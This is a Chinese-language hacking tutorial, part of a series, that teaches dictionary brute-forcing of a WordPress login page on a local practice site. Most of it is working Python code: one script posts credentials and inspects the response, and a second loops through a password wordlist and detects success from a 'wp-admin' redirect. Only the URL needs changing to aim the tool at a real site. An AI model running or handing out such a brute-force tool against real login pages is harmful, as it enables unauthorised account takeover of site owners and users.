Python黑客攻防（八）密码破解攻击

进行黑客攻击通常需要做大量重复性工作。如果黑客直接通过浏览器攻击Web网站，就要不断手动修改输入值，并反复点击。但如果可以在应用程序内部访问Web网站并接收结果值，那么只需要使用简单的几行代码就能成功攻破目标网站。本篇文章讲解对网站的登入密码进行暴力破解。

python环境

靶场->Python黑客攻防（四）搭建测试环境

1.先开启靶场，浏览器输入http://127.0.0.1/wp-login.php，该页面可以输入用户名和密码，是我们的目标页面。

2.了解python是如何调用web页面的。见下方代码及分析。

2. import urllib.request
4. url = " http://127.0.0.1/wp-login.php"
5. values = {'log': 'python', 'pwd': 'python1'}
6. headers = {'User-Agent': 'Mozilla/4.0(compatible;MIS 5.5; Windows NT)'}
7. data = urllib.parse.urlencode(values).encode(encoding='utf-8')
8. request = urllib.request.Request(url, data, headers) #创建Request对象
9. response = urllib.request.urlopen(request) #调用Web页面使用Request对象返回结果值
11. print("#UTL:%s"%response.geturl()) # 输出URL
12. print("#CODE:%s"%response.getcode()) #输出状态码
13. print("#INFO:%s"%response.info())
14. print("#DATA:%s"%response.read())

复制代码

分析：

破解密码是我们的目的，这里我们假设已经知道用户名为python，键‘pwd’对应的值就是密码。这是我们要传送的值。我们先设置错误的密码，目的是查看返回给我们的数据。第五行headers是设置HTTP头值，第六行是将传送值设置为HTTP协议形式。第七行是创建Request对象，若只简单调用URL，放入URL参数即可。使用的是POST方法传递值或需要设置头部分值时，要分别将相应数据作为参数传入，运行结果见下图。

3.由上图的错误密码运行结果可知返回的URL是我们原始的URL，现在我们也点鼠标右键查看源代码。

HTML源代码含有多种标记，其中，需要掌握用于接收用户输人并传递给Web服务器的标记与字段。首先，标记的action字段用于指定接收用户输人的页面。标记的name字段用于设置保存用户输人值的变量名。从HTML源代码可知，用户名保存于log变量，密码保存于pwd变量，然后传送给Web服务器。

现在我们尝试传入的是正确的密码，查看一下返回的数据。

由上图可以看到返回的URL与上次的不同，并且URL中wp-admin可以很明显的区别于刚才的URL，这个我们后面可以利用。

4.我们用密码字典来进行暴破，密码字典是很关键的一部分，我们可以通过对网站的信息收集，然后在线生成密码字典，提高破解速度。也可以下载专门的字典文件，这里我们在线生成一个密码字典，如下图，输入信息生成密码，然后创建文本，将密码粘贴进去。

5.python密码破解

1. # -*- coding: gbk -*-
2. import urllib.request
4. url = " http://127.0.0.1/wp-login.php"
5. user_login = "python"
7. wordlist = open(r"C:\Users\ASUS\Desktop\word.txt", "r",encoding='UTF-8')
8. passwords = wordlist.readlines()
9. for password in passwords:
10. password = password.strip()
11. values = {'log': user_login, 'pwd': password}
12. data = urllib.parse.urlencode(values).encode(encoding='utf-8')
13. request = urllib.request.Request(url, data)
14. response = urllib.request.urlopen(request)
17. try:
18. idx = response.geturl().index('wp-admin')
20. except:
21. idx = 0
23. if (idx>0):
24. print("-"*10+"破解成功!密码为："+password+"-"*10)
25. break
26. else:
27. print("-"*10+"破解中.....正在尝试："+password+"-"*10)
29. wordlist.close()

复制代码

这代码是在上一个代码的基础上添加了循环，读取字典及登录检测，登录检测就是第18行的对返回的URL进行是否包含管理页面地址的子字符串检测，以此来判断是否登录成功，现在运行代码，破解成功。

觉得不错可以关注微信公众号：黑客帮。